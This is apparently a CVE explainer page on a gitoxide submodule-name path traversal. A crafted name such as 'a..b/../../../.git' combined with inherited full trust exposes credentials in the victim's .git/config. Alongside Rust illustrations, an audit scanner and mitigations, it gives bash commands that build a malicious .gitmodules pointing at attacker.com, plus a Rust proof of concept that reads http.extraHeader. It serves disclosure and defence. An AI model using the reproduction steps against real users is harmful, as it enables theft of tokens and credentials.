How the mentioned CVE works:
The vulnerability combines three bugs in gitoxide (the Rust Git implementation).

Bug 1 – Validation bypass in `gix-validate/src/submodule.rs`, function `name()`: it calls `name.find(b"..")`, which returns only the first occurrence. A crafted submodule name such as `a..b/../../../.git/` passes because the first `..` (at position 1) is followed by `b` rather than `/` or `\`, so the function returns `Ok` without ever examining the `../../..` traversal sequence that follows.

Bug 2 – The validation function `gix_validate::submodule::name()` has zero production callers. The `names()` iterator in `gix-submodule/src/access.rs:29` returns unvalidated names, and `git_dir()` at `gix/src/submodule/mod.rs:198-204` builds filesystem paths directly from the raw name via `join(gix_path::from_bstr(self.name()))`.

Bug 3 – Trust inheritance bypass in `Submodule::open()` (line 270): it clones the parent repository's open options, which include `git_dir_trust = Some(Trust::Full)`. At `gix/src/open/repository.rs:103-104` the ownership check is skipped because the trust is already `Some(Full)`. Any traversed path (e.g. `.git/modules/a..b/../../../.git`, which resolves to the parent repository's own `.git/`) is therefore opened with full trust, bypassing safe-directory protections.

Attack chain: the attacker crafts a `.gitmodules` containing `[submodule "a..b/../../../.git"]`; the victim clones the repository and a gitoxide-based tool calls `Submodule::open()` (or `status()`); `git_dir()` resolves to the parent `.git/`; `open_opts()` carries `Trust::Full`; the victim's own `.git/config` is fully parsed, exposing credentials (tokens in remote URLs, `http.extraHeader`, the `credential` section, `core.sshCommand`).

Impact: High – network vector, user interaction required, credential disclosure.
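To make the three bugs concrete, here is an added Rust example (not gitoxide's code, and not from the advisory) that reconstructs the first-occurrence check as described above, puts the component-wise check a fix needs beside it, and lexically resolves `.git/modules/<name>` to show where an unvalidated name actually points. All function names are this example's own.

```rust
use std::path::{Component, Path, PathBuf};

// Added illustration (not gitoxide's code): a reconstruction of the first-occurrence
// check described above, the component-wise check that replaces it, and a lexical
// resolution of `<git_dir>/modules/<name>` showing where an unvalidated name lands.

/// Flawed check: only the FIRST `..` in the name is inspected, and it is rejected
/// only when it forms a whole component (bounded by `/`, `\` or the ends of the name).
fn vulnerable_name_check(name: &[u8]) -> bool {
    if name.is_empty() {
        return false;
    }
    let pos = match name.windows(2).position(|w| w == b"..") {
        Some(pos) => pos,
        None => return true,
    };
    let starts_component = pos == 0 || matches!(name[pos - 1], b'/' | b'\\');
    let ends_component = name.get(pos + 2).map_or(true, |&c| c == b'/' || c == b'\\');
    // `a..b/../../../.git/` passes: the first `..` is embedded in `a..b`,
    // and the remaining `../../..` is never looked at.
    !(starts_component && ends_component)
}

/// Hardened check: every component, split on `/` and `\`, must be a plain directory
/// name. Also rejects empty names, absolute names and a leading `-` (option
/// injection), mirroring the rules git itself applies to submodule names.
fn hardened_name_check(name: &[u8]) -> bool {
    if name.is_empty() || matches!(name[0], b'-' | b'/' | b'\\') {
        return false;
    }
    name.split(|&c| c == b'/' || c == b'\\')
        .all(|component| component != b".." && component != b".")
}

/// Lexically normalise `<git_dir>/modules/<name>` without touching the filesystem:
/// each `..` pops the previous normal component, which is how the kernel will
/// resolve the path that an unvalidated `git_dir()` builds from the raw name.
fn resolved_module_dir(git_dir: &Path, name: &[u8]) -> PathBuf {
    let name = String::from_utf8_lossy(name);
    let joined = git_dir.join("modules").join(&*name);
    let mut stack: Vec<Component> = Vec::new();
    for component in joined.components() {
        match component {
            Component::CurDir => {}
            Component::ParentDir => {
                let top_is_normal = matches!(stack.last(), Some(Component::Normal(_)));
                if top_is_normal {
                    stack.pop();
                } else {
                    stack.push(component);
                }
            }
            other => stack.push(other),
        }
    }
    stack.into_iter().collect()
}

fn main() {
    let names: [&[u8]; 4] = [b"libs/foo", b"../escape", b"a..b", b"a..b/../../../.git/"];
    for name in names {
        println!(
            "{:<22} vulnerable={:<5} hardened={:<5} resolves to {}",
            String::from_utf8_lossy(name),
            vulnerable_name_check(name),
            hardened_name_check(name),
            resolved_module_dir(Path::new(".git"), name).display()
        );
    }
}
```

The last row of the output is the whole bug in one line: the flawed check accepts the name, the component-wise check rejects it, and the joined path collapses to the parent repository's `.git`.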
dailycve form:
Platform: gitoxide
Version: before fix
Vulnerability: path traversal
Severity: High
date: 2025-02-19
Prediction: 2025-03-15
What Undercode Says:
Bash commands to test traversal:
git init malicious
cd malicious
git config -f .gitmodules submodule."a..b/../../../.git".path innocent
git config -f .gitmodules submodule."a..b/../../../.git".url https://attacker.com/repo.git
git add .gitmodules
git commit -m "malicious submodule"
Rust code to reproduce:
fn main() -> Result<(), Box<dyn std::error::Error>> {
    let repo = gix::open("victim_repo")?;
    // `submodules()` yields `None` when the repository has no `.gitmodules`.
    if let Some(submodules) = repo.submodules()? {
        for sub in submodules {
            // On a vulnerable version a traversing name makes `open()` hand back the parent's own `.git/`.
            if let Ok(Some(sub_repo)) = sub.open() {
                let cfg = sub_repo.config_snapshot();
                println!("{}: {:?}", sub.name(), cfg.string("http.extraHeader"));
            }
        }
    }
    Ok(())
}
Exploit:
Craft a `.gitmodules` with a traversing submodule name and push it to a public repo. The victim clones it and runs a gitoxide-based tool that calls `Submodule::open()` (for example anything that computes submodule status). The name `a..b/../../../.git`, joined under `.git/modules/`, resolves to the victim's own `.git/`. Because the open inherits `Trust::Full`, that `.git/config` is parsed with full trust, exposing OAuth tokens, `core.sshCommand`, or private remote URLs.
Protection from this CVE:
- Upgrade gitoxide to patched version (iterate all `..` occurrences in validation).
- Call `gix_validate::submodule::name()` in `git_dir()` before path construction.
- Do not inherit `git_dir_trust` from parent; always re-derive trust from path ownership.
- Do not rely on `safe.directory` settings (e.g. `git config --global safe.directory`) as a mitigation: with the inherited `Trust::Full` the ownership check is never consulted, so the setting has no effect on this bug.
- Audit tools using gitoxide for submodule handling.
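For the audit step, an added Rust example (not part of the page or of gitoxide): it parses the `[submodule "..."]` headers of a constructed `.gitmodules`, which includes the entry the bash commands above create, and reports every name that would escape `.git/modules/`. The file content and function names are this example's own.

```rust
// Added example (not gitoxide's code): an audit pass over a `.gitmodules` file that
// reports submodule names able to escape `.git/modules/`. The content below is
// constructed for the demo and contains the entry the bash commands above produce.
const SAMPLE_GITMODULES: &str = r#"[submodule "innocent"]
    path = innocent
    url = https://example.com/innocent.git
[submodule "a..b/../../../.git"]
    path = innocent
    url = https://attacker.com/repo.git
[submodule "vendor/lib"]
    path = vendor/lib
    url = https://example.com/lib.git
"#;

/// Return the subsection name from a `[submodule "name"]` header line.
/// Simplification: git allows `\"` escapes inside the subsection; this audit
/// does not decode them.
fn submodule_header_name(line: &str) -> Option<&str> {
    let rest = line.trim().strip_prefix("[submodule \"")?;
    let end = rest.rfind("\"]")?;
    Some(&rest[..end])
}

/// The rule a fixed validator must apply to the whole name, not just its first
/// `..`: no `..` component (split on `/` or `\`), no empty or absolute name,
/// no leading `-`.
fn name_escapes_modules_dir(name: &str) -> bool {
    name.is_empty()
        || name.starts_with(|c: char| matches!(c, '-' | '/' | '\\'))
        || name.split(|c: char| c == '/' || c == '\\').any(|c| c == "..")
}

/// Every submodule name in `gitmodules` that fails the check, in file order.
fn find_traversing_names(gitmodules: &str) -> Vec<String> {
    gitmodules
        .lines()
        .filter_map(submodule_header_name)
        .filter(|name| name_escapes_modules_dir(name))
        .map(str::to_owned)
        .collect()
}

fn main() {
    let bad = find_traversing_names(SAMPLE_GITMODULES);
    if bad.is_empty() {
        println!("no traversing submodule names");
    } else {
        for name in &bad {
            println!("REJECT: [submodule \"{}\"] escapes .git/modules/", name);
        }
    }
}
```

Run this over the `.gitmodules` of a freshly cloned repository before any gitoxide-based tooling touches its submodules; a non-empty result is a reason to refuse the repository rather than to continue.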
Impact:
Confidentiality: High – arbitrary git configs (credentials, tokens) exposed from any traversable `.git` directory. Integrity: None directly, but leaked tokens enable lateral compromise. Availability: None. Affects all platforms using gitoxide < patched version (Rust crates gix, gitoxide). Requires victim to perform submodule operation on malicious repo. Same class as GHSA-7w47-3wg8-547c but with trust bypass amplifier.
Sources:
Reported By: github.com